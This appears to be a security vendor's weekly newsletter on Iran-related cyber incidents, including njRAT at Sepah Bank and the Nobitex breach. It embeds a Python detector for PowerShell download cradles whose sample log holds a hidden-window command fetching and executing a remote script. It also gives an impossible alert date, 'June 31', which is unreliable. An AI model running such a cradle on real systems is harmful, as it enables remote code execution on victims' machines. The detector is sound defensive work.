Weekly Cybersecurity Report | Week 25, 2025

As your dedicated cybersecurity services provider, Cyberone equips you with timely and in-depth information about current cyber attacks. Discover a weekly cybersecurity report of the latest exploits and breaches shaping the ever-evolving cybersecurity landscape.

Information security updates and events from the past week

1 Hackers hacked Iranian TV channels and broadcast calls for rebellion against the regime

Channels affiliated with the Iranian opposition reported a widespread hack of Iranian TV channels, during which hackers broadcast messages calling on the Iranian public to take to the streets and revolt against the regime. Among the channels hacked was the government-run IRIB network.

The messages broadcast showed women cutting their hair, a symbolic gesture well remembered from the major protests that broke out in Iran about two and a half years ago. Those protests followed the death of Mahsa Amini, a young Iranian woman of Kurdish origin, after she was beaten by the Iranian morality police in Tehran.

The IRIB network, which is owned and directly supervised by the Iranian regime, serves as one of the government’s main propaganda tools. The hack is a significant symbolic blow to the regime and demonstrates the vulnerabilities of government media systems.

2 Iran’s AFTA Center for Strategic Management publishes investigation into attack that hit Sepah Bank’s core systems – njRAT malware infiltrated email server

Iran has now published an official investigation into the attack that targeted Sepah Bank, one of the country’s key government banks.

According to the report, this was a large-scale attack which its authors attribute to a sophisticated state actor, and it included remote control of systems, data theft, and infection of workstations.

– Attack tool: The infiltration was carried out using njRAT malware, a type of Remote Access Trojan, which allowed attackers to control internal systems, steal sensitive files, and monitor the bank’s email traffic. The report includes precise documentation of the PowerShell code that was used to download the RAT to the infected workstations.

– Infiltration vector: The malware was apparently introduced through the MDaemon server, an aging internal email platform that the bank ran on outdated operating systems such as Windows Server 2003. The attackers identified vulnerabilities in it and exploited them from external IP addresses to inject the malicious code.

– Attack stages: According to the report, the infiltration began with a phishing campaign or through an unsecured connection, continued with the download of a malicious file from the server, and ended with full control of the bank’s internal infrastructure.

Internal reactions in Iran: The report admits that this was a serious attack, and reveals that the bank’s defenses, including antivirus, failed to initially identify the threat. Only after an in-depth analysis was the full infrastructure deployed against the bank discovered.

This is a strategic infiltration into the heart of an Iranian financial system, using remote control tools and sophisticated infrastructure.
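The report above describes two defensive gaps a SOC can check for directly: PowerShell being used to pull a RAT onto workstations, and a mail server running on an unsupported operating system. The following is an added example written for this newsletter, not code from the AFTA report or from any vendor product: it scans constructed PowerShell script-block log lines (a simplified tab-separated format assumed here, not any real product's schema; the hosts, timestamps, IP address and script text are all invented) for download-cradle indicators and raises the severity when the host is on an end-of-life OS.

```python
"""Flag PowerShell download-cradle activity in script-block log lines.

Added example for the Sepah Bank item. Assumes a constructed log format:
    <timestamp>\t<host>\t<os name>\t<script text>
(not a real product schema) and invented sample lines.
"""
import re
from dataclasses import dataclass, field

# Indicator families defenders commonly hunt for in PowerShell
# ScriptBlock logging when looking for download cradles.
INDICATORS = {
    "web_download": re.compile(
        r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|"
        r"start-bitstransfer|net\.webclient", re.I),
    "in_memory_exec": re.compile(r"invoke-expression|\biex\b", re.I),
    "encoded_command": re.compile(
        r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "evasion_flags": re.compile(
        r"-w(indowstyle)?\s+hidden|-nop\b|-noprofile|"
        r"-ep\s+bypass|executionpolicy\s+bypass", re.I),
}

# Operating systems that no longer receive security updates.
EOL_OS = ("windows server 2003", "windows server 2008", "windows xp", "windows 7")

# Weight per indicator family; an EOL host adds one point on top.
WEIGHTS = {"web_download": 2, "in_memory_exec": 2,
           "encoded_command": 2, "evasion_flags": 1}


@dataclass
class Finding:
    ts: str
    host: str
    indicators: list = field(default_factory=list)
    eol_os: bool = False

    @property
    def score(self) -> int:
        return sum(WEIGHTS[i] for i in self.indicators) + (1 if self.eol_os else 0)

    @property
    def severity(self) -> str:
        if self.score >= 4:
            return "high"
        if self.score >= 2:
            return "medium"
        return "low"


def parse_line(line: str):
    """Split one tab-separated log line into its four fields, or None."""
    parts = line.rstrip("\n").split("\t", 3)
    return tuple(parts) if len(parts) == 4 else None


def analyse(ts: str, host: str, os_name: str, script: str):
    """Return a Finding for this event, or None if nothing is notable."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(script)]
    eol = any(marker in os_name.lower() for marker in EOL_OS)
    if not hits and not eol:
        return None
    return Finding(ts=ts, host=host, indicators=hits, eol_os=eol)


def scan_logs(lines):
    """Run the detector over an iterable of log lines, skipping malformed ones."""
    findings = []
    for line in lines:
        fields = parse_line(line)
        if fields is None:
            continue
        finding = analyse(*fields)
        if finding is not None:
            findings.append(finding)
    return findings


# Constructed sample events (hosts, OS names, address and scripts are invented).
SAMPLE_LOG = [
    "\t".join(["2025-06-20T09:14:02Z", "MAIL01", "Windows Server 2003",
               "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
               ".DownloadString('http://203.0.113.10/update.ps1')\""]),
    "\t".join(["2025-06-20T09:15:40Z", "WS-042", "Windows 10",
               "Get-ChildItem C:\\Reports | Where-Object { $_.Length -gt 1MB }"]),
    "\t".join(["2025-06-20T09:16:05Z", "WS-017", "Windows 10",
               "powershell -EncodedCommand QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQQ=="]),
    "\t".join(["2025-06-20T09:17:33Z", "DC01", "Windows Server 2008",
               "Get-Service | Where-Object Status -eq 'Stopped'"]),
    "malformed line without tabs",
]

if __name__ == "__main__":
    for f in scan_logs(SAMPLE_LOG):
        print(f"{f.severity:6} {f.ts} {f.host} indicators={f.indicators} eol_os={f.eol_os}")
```

Run as a script it prints three findings: the mail server line is rated high (download, in-memory execution, hidden window, and an EOL host), the encoded-command line medium, and the routine command on the Windows Server 2008 host low purely because of the unsupported OS. The weights are illustrative; in a real deployment the indicator list would be tuned against the organisation's own administrative scripts to keep false positives down.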

3 “With a Dog” – Iran issues a government cyber alert, slows down the Internet and closes the stock exchange; there is no doubt that the impact is felt in Iran

The Tehran regime has issued a series of official statements, both from the Presidential Strategic Management Center and from the government spokeswoman, indicating heavy pressures in cyberspace.

Details of the announcements:

– The AFTA Center for Strategic Management of the Presidency has issued a government cyber alert that will be in effect from June 21 to June 31, 2025

– The alert includes a requirement for all system, IT and information security managers to immediately prepare and strictly implement a protection policy

– Government spokeswoman Fatemeh Mohajerani added in a separate message: evacuation messages that arrive by SMS should be disregarded, as they are part of psychological warfare

– The speed of browsing in Iran is being temporarily slowed as a “proactive move for network stability”

– The Iranian capital market is closed to the public “in order to protect citizens’ capital”

Iran officially admits to heavy pressures on its digital infrastructure. While the regime struggles with attempts to destabilize it from within, the impact of external moves, apparently also in the cyber arena, is beginning to seep into the Iranian public.

4 Iran admits: The scale of the attack on the Nobitex exchange is much more serious than initial estimates

Iran is forced to admit that the attack on the Nobitex crypto exchange, which began with a localized intrusion, turned out to be a large-scale takeover of all the company’s systems.

A statement published shortly before this report by Iranian officials said that:

– The company’s internal systems are completely infected

– The attackers had access to employees’ Gmail accounts and social networks

– The scope of the leak “even exceeds the events that struck the transportation company Snapp”

– For comparison, Snapp, which provides ride-hailing and food delivery services throughout Iran (similar to Uber), experienced a cyberattack in late 2023 in which user details, addresses and internal operational information, including real-time driver locations, were leaked. The incident caused the shutdown of critical services and severely damaged public trust.

5 Iran has begun a gradual shutdown of the country’s internet network – initially partially, with estimates that this will lead to an almost complete shutdown soon.

At the same time, Iran is trying to place the blame on Israel, claiming that it was Israel that launched a large-scale cyberattack on the country’s digital infrastructure, with the aim of disrupting services for residents.

However, it is important to emphasize that Iran has a regular policy of shutting down the network during times of security or civil tensions. For example, in November 2019 – following widespread protests – the country was almost completely cut off from the network for several days.

Tools such as VPNs or other circumvention solutions are not necessarily effective, as the Iranian regime controls the Internet access gateways and sometimes even blocks HTTPS traffic.

Alongside this, Iran operates a national intranet (the National Information Network, NIN), which lets residents reach websites and systems under the regime’s supervision even when the country is completely disconnected from the global Internet.

The cybersecurity attacks highlighted in this report aren’t just incidents, they’re blueprints of the adversary’s arsenal. To protect your business you need the right partner. Cyberone is here to help! Check out our services.